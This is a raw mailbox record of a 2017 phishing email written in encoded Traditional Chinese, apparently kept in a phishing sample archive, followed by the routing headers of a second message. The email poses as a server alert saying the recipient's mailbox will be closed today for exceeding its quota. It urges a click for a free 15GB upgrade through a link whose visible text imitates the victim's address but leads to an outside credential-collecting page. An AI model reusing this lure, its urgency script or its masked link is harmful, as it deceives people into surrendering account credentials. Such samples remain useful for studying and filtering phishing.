From: "Email Server" <thanhlongkd@hn.vnn.vn>
Date: Wed, 28 Jun 2017 09:18:24 +0100
Status: O
X-Status: 
X-Keywords:                  
X-UID: 235

You will not see this in a MIME-aware mail reader.
--===============0684282712==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


    	  =

   =670D=52D9=5668=8B66=5831  =

   =

 	  =

 =

    =90F5=4EF6=4E3B=984C:   	  =

   =60A8=7684=90F5=7BB1 (jose@monkey.org) =4ECA=5929=5C07=88AB=95DC=9589! =

   =90F5=4EF6=4FE1=606F: =












	  =

    =6211=5011=6CE8=610F=5230=FF0C=60A8=7684=90F5=7BB1 =914D=984D=5373=5C07=
=7528=5B8C =

 =4E0D=4E45=5F8C=FF0C=60A8=5C07=4E0D=518D=80FD=5920 =63A5=6536=6216=767C=
=9001=65B0=90F5=4EF6=3002 =

 =73FE=5728=FF0C=4F60=9700=8981=4F60=7684=90F5=4EF6=914D =984D=5347=7D1A=
=523015GB=514D=8CBB =

 =9EDE=64CA=4EE5=4E0B=93C8=63A5=FF0C=8B93=60A8=768415GB=514D=8CBB=FF1A =

 http://jose@monkey.org=3Dupgrade?var=3D15GB =

 =60A8=7684=90F5=7BB1=5C07=662F=4ECA=5929=95DC =9589=FF0C=5982=679C=4F60=
=4E0D=5347=7D1A=523015GB =


    =90F5=4EF6=767C=4EF6=4EBA:   	  =

   =90F5=7BB1=4FE1=606F=4E2D=5FC3=20
--===============0684282712==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/>
<meta charset=3D"utf-8">
<title>Untitled Document</title>
</head>

<body><TABLE style=3D"BORDER-BOTTOM: #848484 2px solid; BORDER-LEFT: #84848=
4 2px solid; BORDER-TOP: #848484 2px solid; BORDER-RIGHT: #848484 2px solid=
" cellSpacing=3D0 width=3D900>
<TBODY>
<TR>
<TD height=3D80 width=3D200>&nbsp;</TD>
<TD>
<TABLE border=3D0 width=3D600 align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+4 face=3D"Segoe, Segoe UI, DejaVu Sans, Trebuchet MS, Ver=
dana, sans-serif"><B>=E6=9C=8D=E5=8B=99=E5=99=A8=E8=AD=A6=E5=A0=B1 </B></FO=
NT>&nbsp;</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD>
<HR align=3Dright width=3D150>
</TD>
<TD>
<HR width=3D600>
</TD></TR>
<TR>
<TD>&nbsp; =

<DIV align=3Dright><FONT size=3D+1 face=3D"Segoe, Segoe UI, DejaVu Sans, Tr=
ebuchet MS, Verdana, sans-serif"><B>=E9=83=B5=E4=BB=B6=E4=B8=BB=E9=A1=8C:</=
B> </FONT></DIV>&nbsp; </TD>
<TD>
<TABLE border=3D0 width=3D600 align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+1 face=3D"Segoe, Segoe UI, DejaVu Sans, Trebuchet MS, Ver=
dana, sans-serif">=E6=82=A8=E7=9A=84=E9=83=B5=E7=AE=B1 (jose@monkey.org) =
=E4=BB=8A=E5=A4=A9=E5=B0=87=E8=A2=AB=E9=97=9C=E9=96=89! </FONT></TD></TR></=
TBODY></TABLE></TD></TR>
<TR>
<TD>
<DIV align=3Dright><FONT size=3D+1 face=3D"Segoe, Segoe UI, DejaVu Sans, Tr=
ebuchet MS, Verdana, sans-serif"><STRONG>=E9=83=B5=E4=BB=B6=E4=BF=A1=E6=81=
=AF:</STRONG> </FONT></DIV><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>=
</TD>
<TD>
<TABLE border=3D0 width=3D600 align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+1 face=3D"Segoe, Segoe UI, DejaVu Sans, Trebuchet MS, Ver=
dana, sans-serif">
<P>=E6=88=91=E5=80=91=E6=B3=A8=E6=84=8F=E5=88=B0=EF=BC=8C=E6=82=A8=E7=9A=84=
=E9=83=B5=E7=AE=B1 =E9=85=8D=E9=A1=8D=E5=8D=B3=E5=B0=87=E7=94=A8=E5=AE=8C <=
/P>
<P>=E4=B8=8D=E4=B9=85=E5=BE=8C=EF=BC=8C=E6=82=A8=E5=B0=87=E4=B8=8D=E5=86=8D=
=E8=83=BD=E5=A4=A0 =E6=8E=A5=E6=94=B6=E6=88=96=E7=99=BC=E9=80=81=E6=96=B0=
=E9=83=B5=E4=BB=B6=E3=80=82 </P>
<P>=E7=8F=BE=E5=9C=A8=EF=BC=8C=E4=BD=A0=E9=9C=80=E8=A6=81=E4=BD=A0=E7=9A=84=
=E9=83=B5=E4=BB=B6=E9=85=8D =E9=A1=8D=E5=8D=87=E7=B4=9A=E5=88=B015GB=E5=85=
=8D=E8=B2=BB </P>
<P>=E9=BB=9E=E6=93=8A=E4=BB=A5=E4=B8=8B=E9=8F=88=E6=8E=A5=EF=BC=8C=E8=AE=93=
=E6=82=A8=E7=9A=8415GB=E5=85=8D=E8=B2=BB=EF=BC=9A </P>
<P><A href=3D"http://talwarsharif.com/xupx/ausa/index.php?email=3Djose@monk=
ey.org">http://jose@monkey.org=3Dupgrade?var=3D15GB </A></P>
<P>=E6=82=A8=E7=9A=84=E9=83=B5=E7=AE=B1=E5=B0=87=E6=98=AF=E4=BB=8A=E5=A4=A9=
=E9=97=9C =E9=96=89=EF=BC=8C=E5=A6=82=E6=9E=9C=E4=BD=A0=E4=B8=8D=E5=8D=87=
=E7=B4=9A=E5=88=B015GB </P></FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#d6d6d6 height=3D80>&nbsp; =

<DIV align=3Dright><FONT size=3D+1 face=3D"Segoe, Segoe UI, DejaVu Sans, Tr=
ebuchet MS, Verdana, sans-serif"><B>=E9=83=B5=E4=BB=B6=E7=99=BC=E4=BB=B6=E4=
=BA=BA:</B> </FONT></DIV>&nbsp; </TD>
<TD bgColor=3D#d6d6d6>
<TABLE border=3D0 width=3D600 align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+2 face=3D"Segoe, Segoe UI, DejaVu Sans, Trebuchet MS, Ver=
dana, sans-serif"><B>=E9=83=B5=E7=AE=B1=E4=BF=A1=E6=81=AF=E4=B8=AD=E5=BF=83=
</B> </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HT=
ML>
--===============0684282712==--


From jose@monkey.org Sun Jul  2 14:08:07 2017 +0000
Return-Path: carla.beck@marriott.com
Delivered-To: jose@monkey.org
X-FDA: 73016150214.02.DB8DA8A
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin02.b.hostedemail.com (Postfix) with ESMTP id 7120446815;
	Sun,  2 Jul 2017 14:08:07 +0000 (UTC)
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,carla.beck@marriott.com,::::info@mail.com,RULES_HIT:30037:30052:30054:30064:30070:30083:30091,0,RBL:162.130.1.184:@marriott.com:.lbl8.mailshell.net-62.50.0.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:11,LUA_SUMMARY:none
X-HE-Tag: curve09_46cd6ff14a029
X-Filterd-Recvd-Size: 5511
Received: from hdqncironsmtp3.marriott.com (host184.marriott.com [162.130.1.184])
	by imf03.b.hostedemail.com (Postfix) with ESMTP;
	Sun,  2 Jul 2017 14:08:06 +0000 (UTC)
X-Marr-Info: Remote-IP = 162.130.140.106
X-Marr-Info: HAT Group = RELAY_No_Restrictions
X-Marr-Info: Mailflow Policy = $RELAYED-NoAuth-NoThrottle
X-IronPort-AV: E=Sophos;i="5.40,297,1496116800"; 
   d="scan'208,217";a="391967594"
X-Marr-Info: Marked Clean
Received: from hdqncexhub02.marriott.com (HELO HDQNCEXHUB02.mihdq.marrcorp.marriott.com) ([162.130.140.106])
  by hdqncironsmtp3.marriott.com with ESMTP/TLS/AES128-SHA256; 02 Jul 2017 10:08:05 -0400
Received: from HDQNCEXHYB01.mihdq.marrcorp.marriott.com (162.130.140.109) by
 HDQNCEXHUB02.mihdq.marrcorp.marriott.com (162.130.140.106) with Microsoft
 SMTP Server (TLS) id 14.3.339.0; Sun, 2 Jul 2017 10:08:05 -0400
Received: from HDQNCEXD1MBX07.mihdq.marrcorp.marriott.com ([169.254.7.151]) by
 HDQNCEXHYB01.mihdq.marrcorp.marriott.com ([162.130.140.109]) with mapi id
 14.03.0339.000; Sun, 2 Jul 2017 10:08:04 -0400
